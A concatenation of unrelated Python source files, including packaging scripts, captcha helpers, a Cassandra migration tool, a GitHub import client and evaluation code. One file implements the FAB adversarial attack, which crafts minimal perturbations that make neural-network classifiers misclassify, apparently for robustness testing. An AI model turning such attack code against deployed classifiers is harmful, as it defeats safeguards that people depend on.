"Segment corruption: {0}".format(
"(non-fatal) retrying" if retries else "max retries exceeded"
)
)
if retries:
return self.write_segment(segment, q_complete, retries - 1)
else:
raise RuntimeError("Segment corruption. Max retries exceeded.")
r.close()
return written
def print_download_information(self):
self.log.debug("Starting download : {0}".format(self.url))
self.log.debug("File name : {0}".format(self.name))
# some tarfiles will not come with Content-Length in the header
if self.size:
self.log.debug(
"Download size : {0} B ({1:.2f} GB)".format(
self.size, (self.size / float(const.GB))
)
)
self.log.debug("Downloading file to : {0}".format(self.path))
| StarcoderdataPython |
52065 | # pylint: disable=no-name-in-module,import-error
"""
Copyright 2017-2018 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
from distutils.core import setup
from setuptools import find_packages
from setuptools.command.install import install
DESCRIPTION = "Icetea - test framework"
OWNER_NAMES = "<NAME>"
OWNER_EMAILS = "<EMAIL>"
VERSION = "2.0.1"
def read(fname):
"""
Utility function to cat in a file
:param fname: filename
:return: file content as a String
"""
return open(os.path.join(os.path.dirname(__file__), fname)).read()
INSTALL_REQUIRES = [
"prettytable<1.0",
"requests",
"yattag>=1.0,<2.0",
"pyserial>2.5",
"jsonmerge>=1.4.0,<2.0",
"jsonschema<3.0.0",
"mbed-ls>=1.5.1,<2.0",
"semver>=2.0,<3.0",
"mbed-flasher>=0.10.1,<0.11",
"six>=1.0,<2.0",
"pydash>=4.0,<5.0",
"transitions<1.0"
]
TEST_REQUIRES = [
"coverage>=4.0,<5.0",
"mock>=2.0,<3.0",
"sphinx>=1.0,<2.0",
"lxml",
"pylint>=1.0,<2.0",
"astroid>=1.0,<2.0"
]
class VerifyVersionCommand(install):
"""
Custom command to verify that the git tag matches our version
"""
description = "verify that the git tag matches our version"
def run(self):
is_ci = os.getenv("CIRCLECI")
if is_ci:
tag = os.getenv("CIRCLE_TAG")
version = "v" + VERSION
if tag != version:
info = "Git tag: {0} does not match the"\
"version of this app: {1}".format(tag, version)
sys.exit(info)
# else: you are your own - please do not publish any releases without tag!
setup(name="icetea",
version=VERSION,
description=DESCRIPTION,
long_description=read("README.md"),
long_description_content_type='text/markdown',
author=OWNER_NAMES,
author_email=OWNER_EMAILS,
maintainer=OWNER_NAMES,
maintainer_email=OWNER_EMAILS,
url="https://github.com/ARMmbed/icetea.git",
packages=find_packages(include=["icetea_lib.*", "icetea_lib"]),
data_files=[("icetea_lib", ["icetea_lib/tc_schema.json", "icetea_lib/logging_schema.json"])],
include_package_data=True,
keywords="armbed mbed-os mbed-cli ci framework testing automation",
license="(R) ARM",
tests_require=TEST_REQUIRES,
test_suite="test",
entry_points={
"console_scripts": [
"icetea=icetea_lib:icetea_main"
]
},
install_requires=INSTALL_REQUIRES,
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
cmdclass={
"verify": VerifyVersionCommand,
}
)
| StarcoderdataPython |
152715 | <filename>simplemathcaptcha/utils.py
from __future__ import absolute_import
from __future__ import unicode_literals
from random import randint, choice
from hashlib import sha1
from django.conf import settings
from django.utils import six
MULTIPLY = '*'
ADD = '+'
SUBTRACT = '-'
CALCULATIONS = {
MULTIPLY: lambda a, b: a * b,
ADD: lambda a, b: a + b,
SUBTRACT: lambda a, b: a - b,
}
OPERATORS = tuple(CALCULATIONS)
def hash_answer(value):
answer = six.text_type(value)
to_encode = (settings.SECRET_KEY + answer).encode('utf-8')
return sha1(to_encode).hexdigest()
def get_operator():
return choice(OPERATORS)
def get_numbers(start_int, end_int, operator):
x = randint(start_int, end_int)
y = randint(start_int, end_int)
# avoid negative results for subtraction
if y > x and operator == SUBTRACT:
x, y = y, x
return x, y
def calculate(x, y, operator):
func = CALCULATIONS[operator]
total = func(x, y)
return total
| StarcoderdataPython |
1610497 | import os
from setuptools import setup
setup(
name="words",
version="0.0.1",
description=("Code Styles Python starter",),
license="MIT",
keywords="Python",
packages=['words'],
setup_requires=[
'pytest-runner',
],
tests_require=[
'pytest',
]
)
| StarcoderdataPython |
185742 | <reponame>Ganasagar/migration-tools-repo<gh_stars>0
import base64
import math
import os
import json
import logging as log
RACK_TOPOLOGY_TEMPLATE = """
- rack: {}
rackLabelValue: {}"""
NODE_TOPOLOGY_TEMPLATE = """
- datacenter: {}
datacenterLabels:
failure-domain.beta.kubernetes.io/region: {}
nodes: {}
rackLabelKey: failure-domain.beta.kubernetes.io/zone
racks: {}"""
PASSWD_SECRET_TEMPLATE = """apiVersion: v1
kind: Secret
metadata:
name: {}
type: Opaque
data:
username: {}
password: {}"""
PASSWD_SECRET_YAML_FILE = "cassandra-auth.yaml"
# KUBERNETES CLI
KUBECTL = os.getenv("KUBECTL", "kubectl")
SEP = "--------------------------------------------------"
WARNING = """
WARNING: ALL THE PARAMETERS ARE GENERATED AS PER THE DCOS VERSION OF THE SERVICE, IT MIGHT NOT BE THE BEST FOR K8s.
SO BEFORE INSTALLING THE SERVICE PLEASE OPEN A TARGET FILE ({}) AND MODIFY VALUES AS PER THE AVAILABILITY ON THE K8s CLUSTER.
SPECIALLY VALUES OF THESE FIELDS SHOULD BE ADJUSTED AS PER THE CLUSTER:
NODE_COUNT
NODE_CPU_MC
NODE_CPU_LIMIT_MC
NODE_MEM_MIB
NODE_MEM_LIMIT_MIB
NODE_DISK_SIZE_GIB
NODE_TOPOLOGY
EXTERNAL_SEED_NODES
OTC_COALESCING_STRATEGY - value should be one of these [disabled fixed movingaverage timehorizon]
ENDPOINT_SNITCH - if GossipingPropertyFileSnitch not working, use SimpleSnitch
TLS_SECRET_NAME - Only relavent if TLS is enabled
AUTHENTICATION_SECRET_NAME - Only relavent if AUTHENTICATOR is set to PasswordAuthenticator
"""
def print_password_secret_instruction(target_dir: str, secret_name: str, namespace: str, username: str, password: str):
secret_yaml_file = os.path.join(target_dir, PASSWD_SECRET_YAML_FILE)
with open(secret_yaml_file, "w+") as f:
f.write(
PASSWD_SECRET_TEMPLATE.format(secret_name,
base64.b64encode(username.encode("ascii")).decode("ascii"),
base64.b64encode(password.encode("ascii")).decode("ascii")))
SECRET_CMD = '''
{kubectl} apply \\
--namespace {namespace} \\
--filename {secret_yaml_file}
'''
print(SEP)
print("Run following command to create secret for PasswordAuthenticator: {}".format(
SECRET_CMD.format(kubectl=KUBECTL, namespace=namespace, secret_yaml_file=secret_yaml_file)))
print(SEP)
def print_tls_instructions(namespace: str):
TLS_CMD = '''
{kubectl} create secret tls {secret_name} \\
--namespace {namespace} \\
--cert {cert_file} \\
--key {key_file}
'''
print(SEP)
print(
"Since TLS is enabled, make sure to create a TLS secret that contains the certificate (cassandra.crt) and the private key (cassandra.key)."
)
print("The name of the secret should be `cassandra-tls` and namespace should be `{}`".format(namespace))
print("Following command could be used here: {}".format(
TLS_CMD.format(kubectl=KUBECTL,
secret_name="cassandra-tls",
namespace=namespace,
cert_file="cassandra.crt",
key_file="cassandra.key")))
print(SEP)
def print_instructions(namespace: str, instance: str, target_file: str, version: str):
KUDO_CMD = '''
{kubectl} kudo install \\
--namespace {namespace} \\
--instance {instance} \\
--parameter-file {target_file} \\
--operator-version {version} \\
cassandra
'''
KUDO_STATUS_CMD = """
{kubectl} kudo plan status \\
--namespace {namespace} \\
--instance {instance}
"""
print(SEP)
print(WARNING.format(target_file))
print(SEP)
print("Run the following command to install Cassandra on K8s: {}".format(
KUDO_CMD.format(kubectl=KUBECTL,
namespace=namespace,
instance=instance,
target_file=target_file,
version=version)))
print(SEP)
print("Run the following command to check the status: {}".format(
KUDO_STATUS_CMD.format(kubectl=KUBECTL, namespace=namespace, instance=instance)))
print(SEP)
print("Make sure plan shows COMPELTE, before proceeding further.")
print(SEP)
def translate_mesos_to_k8s(namespace: str, target_dir: str, src_file: str, target_file: str) -> bool:
log.info(f'Using "{src_file}" file to migrate to kubernetes configuration at "{target_file}"')
tmpl_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../resources/params.yml.tmpl")
if not os.path.exists(src_file):
log.error("Mesos configuration file {} does not exists!".format(src_file))
return False
with open(src_file, "r") as f:
src_envs = json.load(f)
if not os.path.exists(tmpl_file):
log.fatal("Missing Template File {}".format(tmpl_file))
return False
with open(tmpl_file, "r") as f:
tmpl_lines = f.readlines()
# Convert Disk Size from MB to GiB
src_envs["CASSANDRA_DISK_GB"] = str(math.ceil(float(src_envs["CASSANDRA_DISK_MB"]) / 1024))
# Round of the value of CPU
src_envs["CASSANDRA_CPUS"] = str(math.ceil(float(src_envs["CASSANDRA_CPUS"]) * 1000))
# Make sure value is in lowercase
src_envs["CASSANDRA_OTC_COALESCING_STRATEGY"] = src_envs["CASSANDRA_OTC_COALESCING_STRATEGY"].lower()
# Check if TLS is enabled, refer TLS secret
if "SECURITY_TRANSPORT_ENCRYPTION_ENABLED" in src_envs and src_envs[
"SECURITY_TRANSPORT_ENCRYPTION_ENABLED"] == "true":
print_tls_instructions(namespace)
src_envs["CASSANDRA_TLS_SECRET_NAME"] = "cassandra-tls"
# Check if Authenticator is PasswordAuthenticator
if src_envs["CASSANDRA_AUTHENTICATOR"] == "PasswordAuthenticator":
print_password_secret_instruction(target_dir, "cassandra-auth", namespace, src_envs["NEW_SUPERUSER"],
src_envs["NEW_USER_PASSWORD"])
src_envs["CASSANDRA_AUTHENTICATION_SECRET_NAME"] = "cassandra-auth"
# Convert Cassandra Rack-awareness to K8s Cassandra Node Topology
if src_envs["PLACEMENT_REFERENCED_ZONE"] == "true":
racks = ""
for node in range(int(src_envs["NODES"])):
racks += RACK_TOPOLOGY_TEMPLATE.format("rack" + str(node + 1), src_envs['ZONE'][node])
src_envs["NODE_TOPOLOGY"] = NODE_TOPOLOGY_TEMPLATE.format(src_envs["CASSANDRA_LOCATION_DATA_CENTER"],
src_envs["REGION"], src_envs["NODES"], racks)
with open(target_file, "w") as f:
for tmpl in tmpl_lines:
tmpl_key, tmpl_value = tmpl.split(':')
tmpl_value = tmpl_value.strip()
if tmpl_value in src_envs and len(src_envs[tmpl_value]) > 0:
f.write(tmpl_key + ": \"" + src_envs[tmpl_value] + '"\n')
return True
| StarcoderdataPython |
4808108 | <gh_stars>100-1000
import argparse
import jsonlines
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, required=True)
parser.add_argument('--include-nei', action='store_true')
parser.add_argument('--output', type=str, required=True)
args = parser.parse_args()
dataset = jsonlines.open(args.dataset)
output = jsonlines.open(args.output, 'w')
for data in dataset:
doc_ids = list(map(int, data['evidence'].keys()))
if not doc_ids and args.include_nei:
doc_ids = [data['cited_doc_ids'][0]]
output.write({
'claim_id': data['id'],
'doc_ids': doc_ids
})
| StarcoderdataPython |
1605846 | from spanet.network.jet_reconstruction import JetReconstructionModel
| StarcoderdataPython |
3282402 | <filename>autoattack/fab_pt.py
# Copyright (c) 2019-present, <NAME>
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import torch
from autoattack.other_utils import zero_gradients
from autoattack.fab_base import FABAttack
class FABAttack_PT(FABAttack):
"""
Fast Adaptive Boundary Attack (Linf, L2, L1)
https://arxiv.org/abs/1907.02044
:param predict: forward pass function
:param norm: Lp-norm to minimize ('Linf', 'L2', 'L1' supported)
:param n_restarts: number of random restarts
:param n_iter: number of iterations
:param eps: epsilon for the random restarts
:param alpha_max: alpha_max
:param eta: overshooting
:param beta: backward step
"""
def __init__(
self,
predict,
norm='Linf',
n_restarts=1,
n_iter=100,
eps=None,
alpha_max=0.1,
eta=1.05,
beta=0.9,
loss_fn=None,
verbose=False,
seed=0,
targeted=False,
device=None,
n_target_classes=9):
""" FAB-attack implementation in pytorch """
self.predict = predict
super().__init__(norm,
n_restarts,
n_iter,
eps,
alpha_max,
eta,
beta,
loss_fn,
verbose,
seed,
targeted,
device,
n_target_classes)
def _predict_fn(self, x):
return self.predict(x)
def _get_predicted_label(self, x):
with torch.no_grad():
outputs = self._predict_fn(x)
_, y = torch.max(outputs, dim=1)
return y
def get_diff_logits_grads_batch(self, imgs, la):
im = imgs.clone().requires_grad_()
with torch.enable_grad():
y = self.predict(im)
g2 = torch.zeros([y.shape[-1], *imgs.size()]).to(self.device)
grad_mask = torch.zeros_like(y)
for counter in range(y.shape[-1]):
zero_gradients(im)
grad_mask[:, counter] = 1.0
y.backward(grad_mask, retain_graph=True)
grad_mask[:, counter] = 0.0
g2[counter] = im.grad.data
g2 = torch.transpose(g2, 0, 1).detach()
#y2 = self.predict(imgs).detach()
y2 = y.detach()
df = y2 - y2[torch.arange(imgs.shape[0]), la].unsqueeze(1)
dg = g2 - g2[torch.arange(imgs.shape[0]), la].unsqueeze(1)
df[torch.arange(imgs.shape[0]), la] = 1e10
return df, dg
def get_diff_logits_grads_batch_targeted(self, imgs, la, la_target):
u = torch.arange(imgs.shape[0])
im = imgs.clone().requires_grad_()
with torch.enable_grad():
y = self.predict(im)
diffy = -(y[u, la] - y[u, la_target])
sumdiffy = diffy.sum()
zero_gradients(im)
sumdiffy.backward()
graddiffy = im.grad.data
df = diffy.detach().unsqueeze(1)
dg = graddiffy.unsqueeze(1)
return df, dg
| StarcoderdataPython |
3350202 | # Copyright 2019- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
import os
import tempfile
import uuid
import atexit
import glob
import sys
import io
from robotide.pluginapi import Plugin, ActionInfo, RideParserLogMessage
from robotide import widgets
from robotide import context
def _message_to_string(msg):
return '%s [%s]: %s\n\n' % (msg.timestamp, msg.level, msg.message.replace('\n\t', ''))
class ParserLogPlugin(Plugin):
"""Viewer for internal log messages."""
def __init__(self, app):
Plugin.__init__(self, app, default_settings={
'log_to_console': False,
'log_to_file': True
})
self._log = []
self._panel = None
self._path = os.path.join(
tempfile.gettempdir(), '{}-ride_parser.log'.format(uuid.uuid4()))
self._outfile = None
self._remove_old_log_files()
atexit.register(self._close)
def _close(self):
if self._outfile is not None:
self._outfile.close()
def _remove_old_log_files(self):
for fname in glob.glob(
os.path.join(tempfile.gettempdir(), '*-ride_parser.log')):
try:
os.remove(fname)
except OSError or IOError as e:
sys.stderr.write("{}".format(e))
pass
@property
def _logfile(self):
if self._outfile is None:
self._outfile = io.open(self._path, 'w', encoding='utf8')
return self._outfile
def enable(self):
self._create_menu()
self.subscribe(self._log_message, RideParserLogMessage)
def disable(self):
self.unsubscribe_all()
self.unregister_actions()
if self._panel:
self._panel.close(self.notebook)
def _create_menu(self):
self.unregister_actions()
self.register_action(ActionInfo(
'Tools', 'View Parser Log', self.OnViewLog, position=83))
def _log_message(self, log_event):
self._log.append(log_event)
if self._panel:
self._panel.update_log()
if self.log_to_console:
print("".format(_message_to_string(log_event))) # >> sys.stdout, _message_to_string(log_event)
if self.log_to_file:
self._logfile.write(_message_to_string(log_event))
self._outfile.flush()
if log_event.notify_user:
font_size = 13 if context.IS_MAC else -1
widgets.HtmlDialog(log_event.level, log_event.message,
padding=10, font_size=font_size).Show()
self.OnViewLog(log_event, show_tab=False)
def OnViewLog(self, event, show_tab=True):
if not self._panel:
self._panel = _LogWindow(self.notebook, self._log)
self.notebook.SetPageTextColour(self.notebook.GetPageCount()-1, wx.Colour(255, 165, 0))
self._panel.update_log()
self.register_shortcut('CtrlCmd-C', lambda e: self._panel.Copy())
if show_tab:
self.notebook.show_tab(self._panel)
class _LogWindow(wx.Panel):
def __init__(self, notebook, log):
wx.Panel.__init__(self, notebook)
self._output = wx.TextCtrl(self, style=wx.TE_READONLY | wx.TE_MULTILINE)
self._output.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
self._log = log
self._notebook = notebook
self._add_to_notebook(notebook)
self.SetFont(widgets.Font().fixed_log)
self.Bind(wx.EVT_SIZE, self.OnSize)
def _add_to_notebook(self, notebook):
notebook.add_tab(self, 'Parser Log', allow_closing=True)
self._output.SetSize(self.Size)
def close(self, notebook):
notebook.delete_tab(self)
def _create_ui(self):
self.SetSizer(widgets.VerticalSizer())
self.Sizer.add_expanding(self._output)
def update_log(self):
self._output.SetValue(self._decode_log(self._log))
def _decode_log(self, log):
result = ''
for msg in log:
result += _message_to_string(msg)
return result
def OnSize(self, evt):
self._output.SetSize(self.Size)
def OnKeyDown(self, event):
keycode = event.GetKeyCode()
if event.ControlDown() and keycode == ord('A'):
self.SelectAll()
else:
event.Skip()
def Copy(self):
pass
def SelectAll(self):
self._output.SetSelection(-1, -1)
| StarcoderdataPython |
1687002 | import requests
from .config import config_value
class Github:
def __init__(self):
self.token = config_value('github', 'token')
self.user = config_value('github', 'user')
self.email = config_value('github', 'email')
self.name = config_value('github', 'name')
# https://docs.github.com/en/rest/reference/repos#list-repositories-for-the-authenticated-user
def repositories(self):
url = 'https://api.github.com/user/repos'
params = {
'accept': 'application/vnd.github.v3+json',
'affiliation': 'owner'
}
response = requests.get(url=url, params=params, auth=(self.email, self.token))
if (response.status_code != 200):
return None
data = response.json()
repos = dict()
for repo in data:
repos[repo['name']] = repo['clone_url']
return repos
# https://docs.github.com/en/rest/reference/repos#create-a-repository-for-the-authenticated-user
def repositoryCreate(self, name, description):
url = 'https://api.github.com/user/repos'
params = {
'accept': 'application/vnd.github.v3+json',
}
json = {
'name': name,
'description': description,
'private': True
}
response = requests.post(url=url, params=params, auth=(self.email, self.token), json=json)
if (response.status_code != 201):
return None
return response.json()['clone_url']
# https://docs.github.com/en/rest/reference/migrations#start-an-import
def importStart(self, gitlabRepoUrl, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
params = {
'accept': 'application/vnd.github.v3+json',
'Content-Type': 'application/json'
}
json = {
'vcs_url': gitlabRepoUrl,
'vcs': 'git',
'vcs_username': config_value('gitlab', 'email'),
'vcs_password': config_value('gitlab', 'token')
}
response = requests.put(url=url, params=params, auth=(self.email, self.token), json=json)
if (response.status_code != 201):
return None
return response.json()
# https://docs.github.com/en/rest/reference/migrations#get-an-import-status
def importStatus(self, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
params = {
'accept': 'application/vnd.github.v3+json'
}
response = requests.get(url=url, params=params, auth=(self.email, self.token))
if (response.status_code != 200):
return None
return response.json()['status']
# https://docs.github.com/en/rest/reference/migrations#cancel-an-import
def importCancel(self, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
params = {
'accept': 'application/vnd.github.v3+json'
}
response = requests.delete(url=url, params=params, auth=(self.email, self.token))
if (response.status_code != 204):
return None
return True
# https://docs.github.com/en/rest/reference/migrations#get-commit-authors
def getCommitAuthors(self, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/authors'
params = {
'accept': 'application/vnd.github.v3+json'
}
response = requests.get(url=url, params=params, auth=(self.email, self.token))
if (response.status_code != 200):
return None
data = response.json()
print(data)
authors = list()
for author in data:
authors.append(author['id'])
return authors
# https://docs.github.com/en/rest/reference/migrations#map-a-commit-author
def mapAuthor(self, githubRepoName, authorId):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/authors/{authorId}'
params = {
'accept': 'application/vnd.github.v3+json'
}
json = {
'email': self.email,
'name': self.name
}
response = requests.patch(url=url, params=params, auth=(self.email, self.token), json=json)
if (response.status_code != 200):
return None
return response.json()
# https://docs.github.com/en/rest/reference/migrations#get-large-files
def getLargeFiles(self, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/large_files'
params = {
'accept': 'application/vnd.github.v3+json'
}
response = requests.get(url=url, params=params, auth=(self.email, self.token))
if (response.status_code != 200):
return None
return response.json()
# https://docs.github.com/en/rest/reference/migrations#update-git-lfs-preference
def lfsPreference(self, githubRepoName):
url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/lfs'
params = {
'accept': 'application/vnd.github.v3+json'
}
json = {
'use_lfs': 'opt_in'
}
response = requests.patch(url=url, params=params, auth=(self.email, self.token), json=json)
if (response.status_code != 200):
return None
return response.json()
| StarcoderdataPython |
1663751 | <reponame>elbuco1/AttentionMechanismsTrajectoryPrediction<filename>src/models/helpers/helpers_evaluation.py
from sklearn.preprocessing import OneHotEncoder
from scipy.spatial import distance_matrix,distance
from scipy.stats import norm
from scipy.spatial.distance import euclidean
from scipy.stats import wasserstein_distance
import matplotlib.image as mpimg
import cv2
import copy
import time
import json
import torch
import sys
import helpers.helpers_training as helpers
import torch.nn as nn
import numpy as np
import os
import ot
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from datasets.datasets import Hdf5Dataset,CustomDataLoader
from pyemd import emd_samples
import scipy
# from classes.evaluation import Evaluation
def ade(outputs,targets,mask = None):
if mask is None:
# mask = torch.ones_like(targets)
mask = np.ones_like(targets)
# if mask is not None:
outputs,targets = outputs*mask, targets*mask
ade = np.subtract(outputs,targets) ** 2
ade = np.sqrt(ade.sum(-1))
ade = ade.sum()/(mask.sum()/2)
return ade
def fde(outputs,targets,mask):
if len(targets.shape) < 3:
outputs = np.expand_dims(outputs,0)
targets = np.expand_dims(targets,0)
mask = np.expand_dims(mask,0)
if mask is None:
mask = np.ones_like(targets)
# if mask is not None:
outputs,targets = outputs*mask, targets*mask
# n,s,i = outputs.shape
ids = (mask.sum(-1) > 0).sum(-1)
points_o = []
points_t = []
mask_n = []
for seq_o,seq_t,m,id in zip(outputs,targets,mask,ids):
if id == 0 or id == len(seq_t):
points_o.append(seq_o[-1])
points_t.append(seq_t[-1])
mask_n.append(m[-1])
else:
points_o.append(seq_o[id-1])
points_t.append(seq_t[id-1])
mask_n.append(m[id-1])
points_o = np.array(points_o)
points_t = np.array(points_t)
mask_n = np.array(mask_n)
fde = np.subtract(points_o,points_t) ** 2
fde = np.sqrt(fde.sum(-1))
fde = fde.sum()/(mask_n.sum()/2.0)
return fde
# i = i.detach().cpu().numpy()
def revert_scaling_evaluation(offsets_input,scalers_path,i):
scaler = json.load(open(scalers_path))
if offsets_input:
meanx = scaler["standardization"]["meanx"]
meany = scaler["standardization"]["meany"]
stdx = scaler["standardization"]["stdx"]
stdy = scaler["standardization"]["stdy"]
i[:,:,0] = helpers.revert_standardization(i[:,:,0],meanx,stdx)
i[:,:,1] = helpers.revert_standardization(i[:,:,1],meany,stdy)
else:
min_ = scaler["normalization"]["min"]
max_ = scaler["normalization"]["max"]
i = helpers.revert_min_max_scale(i,min_,max_)
return i
# i = torch.FloatTensor(i).to(device)
def types_ohe(types,nb_types):
cat = np.arange(1,nb_types+1).reshape(nb_types,1)
ohe = OneHotEncoder(sparse = False,categories = "auto")
ohe = ohe.fit(cat)
b,n = types.shape
# types = types - 1
types = ohe.transform(types.reshape(b*n,-1))
types = types.reshape(b,n,nb_types)
return types
def get_active_mask(mask_target):
sample_sum = (np.sum(mask_target.reshape(list(mask_target.shape[:2])+[-1]), axis = 2) > 0).astype(int)
active_mask = []
for b in sample_sum:
ids = np.argwhere(b.flatten()).flatten()
active_mask.append(torch.LongTensor(ids))
return active_mask
def get_data_loader(parameters_project,data_file,scene,args_net,prepare_param,eval_params):
froze_cnn = 0
if "froze_cnn" in args_net:
froze_cnn = args_net["froze_cnn"]
dataset = Hdf5Dataset(
hdf5_file= data_file,
scene_list= [scene],
t_obs=prepare_param["t_obs"],
t_pred=prepare_param["t_pred"],
set_type = eval_params["set_type_test"],
data_type = "trajectories",
use_neighbors = 1,
use_masks = 1,
predict_offsets = args_net["offsets"],
offsets_input = args_net["offsets_input"],
padding = prepare_param["padding"],
evaluation = 1,
use_images = args_net["use_images"],
images_path = parameters_project["raw_images"],
froze_cnn = froze_cnn
)
data_loader = CustomDataLoader( batch_size = eval_params["batch_size"],shuffle = False,drop_last = False,dataset = dataset,test=0)
return data_loader
def get_speed(point1,point2,deltat):
d = distance.euclidean(point1,point2)
v = d/deltat
return v
def get_speeds(coordinates,framerate):
speeds = []
for i in range(1,len(coordinates)):
speed = get_speed(coordinates[i-1],coordinates[i],framerate)
speeds.append(speed)
return speeds
def get_acceleration(v1,v2,deltat):
a = (v2-v1)/deltat
return a
def get_accelerations(speeds,framerate):
accelerations = []
for i in range(1,len(speeds)):
acceleration = get_acceleration(speeds[i-1],speeds[i],framerate)
accelerations.append(acceleration)
return accelerations
def scene_mask(scene,img_path,annotations_path,spatial_profiles):
img = mpimg.imread(img_path.format(scene))
masks = []
masks_ids = []
for spatial_profile in spatial_profiles:
empty_mask = np.zeros_like(img[:,:,0]).astype(np.int32)
annotations = json.load(open(annotations_path.format(scene)))
polygons = []
for object_ in annotations["objects"]:
if object_["classTitle"] == spatial_profile:
pts = object_["points"]["exterior"]
a3 = np.array( [pts] ).astype(np.int32)
cv2.fillPoly( empty_mask, a3, 1 )
masks.append(empty_mask)
masks_ids.append(spatial_profiles[spatial_profile])
arg_ids = np.argsort(masks_ids)
masks = [masks[i] for i in arg_ids]
return masks
def predict_neighbors_disjoint(inputs,types,active_mask,points_mask,net,device):
b,n,s,i = points_mask[0].shape
b,n,p,i = points_mask[1].shape
# permute every samples
batch_perms = []
batch_p0 = []
batch_p1 = []
for batch_element,p0,p1 in zip(inputs,points_mask[0],points_mask[1]):
batch_element_perms = []
batch_p0_perms = []
batch_p1_perms = []
ids_perm = np.arange(n)
for ix in range(n):
ids_perm = np.roll(ids_perm,-ix)
batch_element_perms.append(batch_element[torch.LongTensor(ids_perm)])
batch_p0_perms.append(p0[ids_perm])
batch_p1_perms.append(p1[ids_perm])
batch_element_perms = torch.stack(batch_element_perms)
batch_perms.append(batch_element_perms)
batch_p0_perms = np.array(batch_p0_perms)
batch_p0.append(batch_p0_perms)
batch_p1_perms = np.array(batch_p1_perms)
batch_p1.append(batch_p1_perms)
# b,n,s,i -> b,n,n,s,i
batch_perms = torch.stack(batch_perms)
batch_p0 = np.array(batch_p0)
batch_p1 = np.array(batch_p1)
# b,n,n,s,i -> b*n,n,s,i
batch_perms = batch_perms.view(-1,n,s,i)
batch_p0 = batch_p0.reshape(-1,n,s,i)
batch_p1 = batch_p1.reshape(-1,n,p,i)
# save inputs
inputs_temp = inputs
points_mask_temp = points_mask
active_mask_temp = active_mask
# new inputs from permutations
inputs = batch_perms
points_mask = (batch_p0,batch_p1)
active_mask = torch.arange(inputs.size()[0]*inputs.size()[1]).to(device)
# prediction
outputs = net((inputs,types,active_mask,points_mask))
# reset inputs
inputs = inputs_temp
points_mask = points_mask_temp
active_mask = active_mask_temp
# select outputs
outputs = outputs[:,0]
outputs = outputs.view(b,n,p,i)
return outputs,inputs,types,active_mask,points_mask
def predict_naive(inputs,types,active_mask,points_mask,net,device,imgs):
b,n,s,i = points_mask[0].shape
b,n,p,i = points_mask[1].shape
# types = types[active_mask]
inputs = inputs.view(-1,s,i).unsqueeze(1)
imgs = imgs.repeat(inputs.size()[0],1,1,1)
types = types.view(-1).unsqueeze(1)
points_mask[0] = np.expand_dims(points_mask[0].reshape(-1,s,i),1)
points_mask[1] = np.expand_dims(points_mask[1].reshape(-1,p,i),1)
# prediction
outputs = net((inputs,types,active_mask,points_mask,imgs))
# b*n,s,i -> b,n,s,i
outputs = outputs.squeeze(1).view(b,n,p,i)
inputs = inputs.squeeze(1).view(b,n,s,i)
types = types.squeeze(1).view(b,n)
points_mask[0] = points_mask[0].squeeze(1).reshape(b,n,s,i)
points_mask[1] = points_mask[1].squeeze(1).reshape(b,n,p,i)
return outputs,inputs,types,active_mask,points_mask
################ Criterions ###########################
def convert_losses(losses,prefix,losses_in):
for key in losses_in:
if key not in losses:
losses[key] = {}
for loss in losses_in[key]:
losses[key][prefix+loss] = losses_in[key][loss]
return losses
def apply_criterion(criterion,scene_files):
results = {"global":{"joint":[],"disjoint":[]}}
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
results[scene] = {"joint":[],"disjoint":[]}
# print(scene)
scene_file = json.load(open(scene_file))
for sample in scene_file:
sample = scene_file[sample]
labels = np.array(sample["labels"])
outputs = np.array(sample["outputs"])
point_mask = np.array(sample["points_mask"])
loss = criterion(outputs.copy(), labels.copy(),point_mask.copy())
loss_unjoint = criterion(outputs[0].copy(), labels[0].copy(),point_mask[0].copy())
results[scene]["joint"].append(loss)
results[scene]["disjoint"].append(loss_unjoint)
results["global"]["joint"].append(loss)
results["global"]["disjoint"].append(loss_unjoint)
results[scene]["joint"] = np.mean(results[scene]["joint"])
results[scene]["disjoint"] = np.mean(results[scene]["disjoint"])
results["global"]["joint"] = np.mean(results["global"]["joint"])
results["global"]["disjoint"] = np.mean(results["global"]["disjoint"])
return results
def spatial_distrib(scene_files, use_inputs = 1):
spatial_conflicts_results = {}
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
scene_file = json.load(open(scene_file))
labels = []
outputs = []
spatial_conflicts_results[scene] = {}
for sample in scene_file:
sample = scene_file[sample]
label = sample["labels"][0]
output = sample["outputs"][0]
inputs = sample["inputs"][0]
type_ = sample["types"][0]
labels += label
outputs += output
if use_inputs:
labels += inputs
spatial_conflicts_results[scene]["distance"] = emd_samples(labels,outputs)
global_ = []
